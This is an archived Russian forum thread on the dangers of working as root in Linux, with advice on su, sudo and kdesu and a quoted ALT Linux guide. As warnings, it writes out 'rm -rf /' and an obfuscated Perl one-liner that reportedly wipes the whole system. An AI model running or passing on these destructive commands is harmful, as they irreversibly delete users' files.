Вот везде например mandrake кричит что это опасно. А в чем собственно опасность кроме того что ты своей криворукостью можешь наваять?
» Юзать linux как root. Опасно? Почему?
xntx
Цитата:
В том, что люди - не машины и могут ошибаться, а под рутом неорганиченные права, а никсы вовсе не так дружелюбны к _пользователю_ как привычные Винды и запросто без предупреждения сделают то, что от них попросит работающий за ними, а исправить это зачастую не так легко, как опять-таки в Винде. Например, удаление файла под Никсом восстановлению поддается весьма и весьма сложно. А никс тебе запросто может удалить вооще всю систему под ноль, если ты под рутом - достаточно простой опечатки в команде.
Поэтому текущую работу лучше делать под пользователем, а для администрирования переходить в рута.
Цитата:
А в чем собственно опасность кроме того что ты своей криворукостью можешь наваять?
В том, что люди - не машины и могут ошибаться, а под рутом неорганиченные права, а никсы вовсе не так дружелюбны к _пользователю_ как привычные Винды и запросто без предупреждения сделают то, что от них попросит работающий за ними, а исправить это зачастую не так легко, как опять-таки в Винде. Например, удаление файла под Никсом восстановлению поддается весьма и весьма сложно. А никс тебе запросто может удалить вооще всю систему под ноль, если ты под рутом - достаточно простой опечатки в команде.
Поэтому текущую работу лучше делать под пользователем, а для администрирования переходить в рута.
"rm -rf /" набери в консоли он даже и не пикнет
а если серьезно, зачем работать по root?
все же мы иногда ошибаемся, вообщем это не на много опаснее чем работать по XP с провами админа, но в мире unix больше параноиков работать под root'ом не желательно, и вообщем не нужно, все что надо, можно делать от обычного пользователя, иногда используя команду su.
кстати на счет того же rm, на одном форуме проскакивала просьба помочь со скриптом на Perl'е выглядит он довольно безобидно, какай та не понятная строчка, а выполнял "rm -rf /", вобщем разграничение прав защитит тебя от ошибок и вирусов, которых ПОКА мало.
Добавлено
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
вот эта строчка, выполнять не советую
а если серьезно, зачем работать по root?
все же мы иногда ошибаемся, вообщем это не на много опаснее чем работать по XP с провами админа, но в мире unix больше параноиков работать под root'ом не желательно, и вообщем не нужно, все что надо, можно делать от обычного пользователя, иногда используя команду su.
кстати на счет того же rm, на одном форуме проскакивала просьба помочь со скриптом на Perl'е выглядит он довольно безобидно, какай та не понятная строчка, а выполнял "rm -rf /", вобщем разграничение прав защитит тебя от ошибок и вирусов, которых ПОКА мало.
Добавлено
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
вот эта строчка, выполнять не советую
xntx
Не опасно. Если хочешь - работай, но только внимательно.
Цитата:
(c) ALT Linux Team
Не опасно. Если хочешь - работай, но только внимательно.
Цитата:
6.2 Почему нельзя работать с правами root.
Ни для кого не секрет, что Linux является многопользовательской операционной системой. Это значит, что она разработана в расчете на одновременную работу нескольких пользователей. При этом всякая будничная работа под Linux, не являющаяся системным администрированием, может и должна выполняться непривилегированными пользователями. Этому правилу необходимо следовать для того, чтобы вероятность того, что Ваша случайная ошибка испортит всю систему, была сведена к минимуму; вероятность того, что возможные ошибки в используемых Вами программах испортят всю систему, была сведена к минимуму.
К сожалению, немалая часть ПО написана безграмотно с точки зрения security. Запуская такие программы непривилегированным пользователем, Вы тем самым автоматически усложняете процедуру вторжения в Вашу систему потенциальных взломщиков.
6.3 Настройка sudo.
Sudo - это программа, разработанная в помощь системному администратору и позволяющая делегировать те или иные привилегированные ресурсы пользователям, с ведением протокола работы. Основная идея - делегировать пользователям как можно меньше прав, но при этом ровно столько, сколько необходимо для решения поставленных задач.
Sudo предоставляет возможность пользователям выполнять команды от имени root'а либо других пользователей. Правила, используемые sudo для принятия решения о предоставлении доступа, находятся в файле /etc/sudoers. Язык написания правил для sudo и примеры использования подробно изложены в sudoers(5). Кроме того, пример правил, предоставляющих пользователям, являющимся членами группы rpm, возможность устанавливать, обновлять и удалять пакеты в системе, приведен в файле /usr/share/doc/sudo-1.6.3p6/rpm.sudoers.
Для редактирования файла /etc/sudoers следует использовать программу visudo, которая проверяет синтаксис и тем самым позволяет избежать ошибок в правилах.
В большинстве случаев грамотная настройка sudo делает работу root'ом ненужной.
(c) ALT Linux Team
хмм... а не задалбывает постоянно делать логаут/логин только чтоб какую-то маленькую настроечку поменять?
xntx
Цитата:
Хм, а ты что, для этого делаешь логаут из KDE/GNOME/etc. и логинишься рутом?
Если мне надо получить полный доступ, я пишу в консоли su и запускаю то что мне нужно - текстовый редактор, файл-менеджер, управляю сервисами и пр.
Делается это уже на полном автомате.
Неужели ты каждые 5 минут меняешь системные настройки?
Цитата:
хмм... а не задалбывает постоянно делать логаут/логин только чтоб какую-то маленькую настроечку поменять?
Хм, а ты что, для этого делаешь логаут из KDE/GNOME/etc. и логинишься рутом?
Если мне надо получить полный доступ, я пишу в консоли su и запускаю то что мне нужно - текстовый редактор, файл-менеджер, управляю сервисами и пр.
Делается это уже на полном автомате.
Неужели ты каждые 5 минут меняешь системные настройки?
Demetrio
пока-что да, каждые 5 минут.
а вот например чтоб мозиллу установить, или тот-же tcl/tk откомпилить/установить рут не нужен?
пока-что да, каждые 5 минут.
а вот например чтоб мозиллу установить, или тот-же tcl/tk откомпилить/установить рут не нужен?
xntx
Всё что ты пишешь в каталоги отличные от $HOME, требует прав рута.
Всё что ты пишешь в каталоги отличные от $HOME, требует прав рута.
xntx
Цитата:
su тебе поможет, ну или sudo см. выше
правда если ты все делаешь из GUI нужны другие решения, в KDE например, глобальные настройки в Control Center, можно делать в режиме Администратора, при этом вводишь пароль root'а и все. Ну и некоторые умные проги тоже умеют пользоваться kdesu, например kmyfirewall, при клике спрашивает пасс, вводишь и изменяешь.
и еще какие это настройки надо постоянно менять? ты каждый день ядро будешь пресобирать? или десяток прог устанавливать/удалять? у меня на этот случай Alt+F1 приготовлен, захожу там под root'ом и ставлю из консоли что надо.
Цитата:
хмм... а не задалбывает постоянно делать логаут/логин только чтоб какую-то маленькую настроечку поменять?
su тебе поможет, ну или sudo см. выше
правда если ты все делаешь из GUI нужны другие решения, в KDE например, глобальные настройки в Control Center, можно делать в режиме Администратора, при этом вводишь пароль root'а и все. Ну и некоторые умные проги тоже умеют пользоваться kdesu, например kmyfirewall, при клике спрашивает пасс, вводишь и изменяешь.
и еще какие это настройки надо постоянно менять? ты каждый день ядро будешь пресобирать? или десяток прог устанавливать/удалять? у меня на этот случай Alt+F1 приготовлен, захожу там под root'ом и ставлю из консоли что надо.
Вот пример....
Помните не так давно в Опере нашли дыру.... типа там, что-то бла, бла, бла - запускать произвольный код... (в том чиcле и rm -rf /)
Ага, запусти эту Оперу под Рутом...... И (при неудачном стечении обстоятельств) до свидания актуальные файлы..... переставляй систему, тащи данные из бэкапа... (если он есть)
Помните не так давно в Опере нашли дыру.... типа там, что-то бла, бла, бла - запускать произвольный код... (в том чиcле и rm -rf /)
Ага, запусти эту Оперу под Рутом...... И (при неудачном стечении обстоятельств) до свидания актуальные файлы..... переставляй систему, тащи данные из бэкапа... (если он есть)
Страницы: 1
Предыдущая тема: Модификация дистрибутива WinXP
Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.